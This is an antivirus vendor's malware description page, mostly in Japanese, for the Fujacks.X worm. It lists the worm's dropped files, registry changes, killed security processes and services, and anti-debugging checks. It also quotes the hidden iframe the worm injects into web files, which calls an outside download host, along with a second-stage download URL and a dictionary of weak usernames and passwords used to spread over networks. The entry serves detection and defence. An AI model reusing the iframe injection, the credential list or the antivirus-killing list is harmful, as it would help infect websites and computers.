English
Deutsch
Francais
Español
Italian
Home
Virus Info
Worm/Fujacks.X
Search
Home
Support
Solutions
Products
Downloads
Virus Info
Statistics
Phishing Worldmap
VDF History
Virus Science
Submit Sample
Security News
Viruses In the Wild
Company
Press
Partners
Newsletter
Worm/Fujacks.X - Worm
参照
概要
詳しい説明
統計
How would you rate this information?
Worthless
Excellent
ウイルス
Worm/Fujacks.X
発見日:
09/02/2007
タイプ
ワーム
感染報告有り
はい
感染報告
低
感染の可能性
中
ダメージ・ポテンシャル
中
スタティック・ファイル
はい
ファイル・サイズ
118.272 バイト
MD5 チェックサム
9d0Ceb2ef643a2f326dfcd8265502ce9
IVDFファージョン:
6.37.01.66
- Fri, 09 Feb 2007 14:18 (GMT+1)
一般情報
感染方法
• ローカル・ネットワーク
• 割り当てられたネットワーク・ドライブ
別名
• McAfee(マカフィー) W32/Fujacks.h
• Kaspersky(カスペルスキー) Worm.Win32.Fujack.a
• F-Secure(エフ・セキュア) Worm.Win32.Fujack.a
• Sophos(ソフォス) W32/Fujacks-AJ
• Panda W32/Radoppan.I.drp
• Grisoft Worm/Generic.ANX
• Eset Win32/Fujacks
• ビットディフェンダー(Bitdefender): Win32.Worm.Fujacks.X
プラットフォーム/OS:
• ウインドウズ 95
• ウインドウズ 98
• ウインドウズ 98 SE
• ウインドウズ NT
• ウインドウズ ME
• ウインドウズ 2000
• ウインドウズ XP
• ウインドウズ 2003
副作用
• セキュリティ・アプリケーションを無効にします。
• ファイルをダウンロードします。
• ファイルを作成します。
• セキュリティの設定を低くします。
• レジストリの改変。
ファイル
それ自体を以下の場所にコピーします。
•
%SYSDIR%
\drivers\CTFMONT.exe
•
%ドライバ%
\setup.exe
以下のファイルにセクションが追加されます。
– 宛先:
%すべてのディレクトリ%
\*.htm 以下の内容:
• iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe
– 宛先:
%すべてのディレクトリ%
\*.html 以下の内容:
• iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe
– 宛先:
%すべてのディレクトリ%
\*.asp 以下の内容:
• iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe
– 宛先:
%すべてのディレクトリ%
\*.php 以下の内容:
• iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe
– 宛先:
%すべてのディレクトリ%
\*.jsp 以下の内容:
• iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe
– 宛先:
%すべてのディレクトリ%
\*.asp 以下の内容:
• iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe
以下のファイルが作成されます:
– 悪意のないファイル:
•
%SYSDIR%
\SVKP.sys
–
%すべてのディレクトリ%
\Desktop_.ini これは以下の内容を含む、悪意のないテキスト・ファイルです:
•
%現在の日付%
–
%ドライバ%
\autorun.inf これは以下の内容を含む、悪意のないテキスト・ファイルです:
•
ファイルをダウンロードしようとします:
– 場所は以下の通りです:
• http://www.ctv163.com/**********/down.txt
このファイルはさらなるダウンロード先を含むため、新たな危険の原因となる恐れがあります。
レジストリ
以下のレジストリ・キーが、再起動後そのプロセスを実行するため、無限ループの中に持続的に追加されます:
– [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
• svcshare =
%SYSDIR%
\drivers\CTMONTv.exe
以下のレジストリ・キーの値が消えています:
– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
• RavTask
• KvMonXP
• kav
• KAVPersonal50
• McAfeeUpdaterUI
• Network Associates Error Reporting Service
• ShStatEXE
• YLive.exe
• yassistse
以下のレジストリ・キーは変更されます:
あらゆるExplorerの設定:
– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
Folder\Hidden\SHOWALL]
前の値
• CheckedValue =
%ユーザ設定%
新しい値
• CheckedValue = 0
ネットワーク感染
感染を確かなものにするために、マルウェアは以下のように他のマシンに接続しようとします。
リモート・マシンへのアクセスを得るために、以下のログイン情報を使用します:
– 以下のユーザ名:
• Administrator
• Guest
• admin
• Root
– 以下のパスワード:
• 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100
IPアドレス作成
ランダムなIPアドレスを作りますが、その最初の3つの8ビットは同じままです。その後それらと接続しようとします。
感染プロセス
ダウンロードしたファイルは、侵入先のマシンに以下の名前で保存されます:
%すべての共有フォルダ%
\GameSetup.exe
処理速度の低下:
– 感染スレッドを以下の数だけ作成します: 10
– 帯域幅の大きさによって、ネットワーク速度の低下が見られるかもしれません。このマルウェアは回線の利用量が中程度のため、ブロードバンド回線を使って接続している場合、ネットワーク速度の低下に気づかないこともあります。
– さらに、ネットワーク・スレッドをいくつか作成するために起こるわずかな速度の低下に気づくかもしれません。
プロセス中断
以下のプロセスは終了されます:
• Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe
以下のウインドウのタイトルを含むプロセスが終了されます:
• Symantec AntiVirus
• Duba
• Windows
• esteem procs
• System Safety Monitor
• Wrapped gift Killer
• Winsock Expert
以下のサービスは無効にされます:
• sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
Symantec Core LC; NPFMntor; MskService; FireSvc
その他
アンチ・デバッギング
以下のファイルが存在するか調べます:
• \\.\TRW
• \\.\SICE
• \\.\NTICE
• \\.\FILEVXD
• \\.\FILEMON
• \\.\REGVXD
• \\.\REGMON
成功すると、以下を表示し、自身は終了します:
ファイルの詳細
プログラム言語:
このマルウェアプログラムはDelphi(デルファイ)で書かれています。
ランタイム・パッカー
検出されにくくするため、またファイルのサイズを縮小するため、以下のランタイム・パッカーで圧縮してあります。
• SVKP
簡単な説明は
ココ
にあります。.
この説明は Andrei Gherman によって Thu, 18 Oct 2007 13:07 (GMT+1) 書き込まれました。
この説明は Andrei Gherman によって Thu, 18 Oct 2007 14:31 (GMT+1) 更新されました。
»
About Malware
»
About Phishing
»
Viruses In the Wild
« back
Print this page
TR/Crypt.CFI.Gen
Worm/Kidala.G
Worm/Mytob.AD
Worm/Mytob.AT
Worm/Mytob.BF
BDS/Frauder.bu
DR/Autoit.I.1
TR/Spy.ZBot.DFR
TR/VB.aei
EXP/Java.Gimsh.A.40
Get comfortable up to the minute info from Avira as
Detects and removes the following malware and its variants:
Worm/Sober.J
Worm/Sober.P
Worm/Sober.Y
W32/Stanit.A
Worm/NetSky.AA
Worm/NetSky.B.1
Worm/NetSky.C
Worm/Netsky.D.Dam
Worm/NetSky.P
Worm/NetSky.X
Worm/Mytob.IN.2
Worm/Mytob.KS
TR/Spy.Banker.AATZ
TR/Spy.Banker.AATZ.1
TR/Spy.Banker.AATZ.2
TR/Spy.Banker.AATZ.3
Download here
Click
here
to get the panel...
© 2008 Avira GmbH
Copyright
Privacy
Sitemap
Feedback
Imprint
FAQ
Contact
Print this page
.gif)
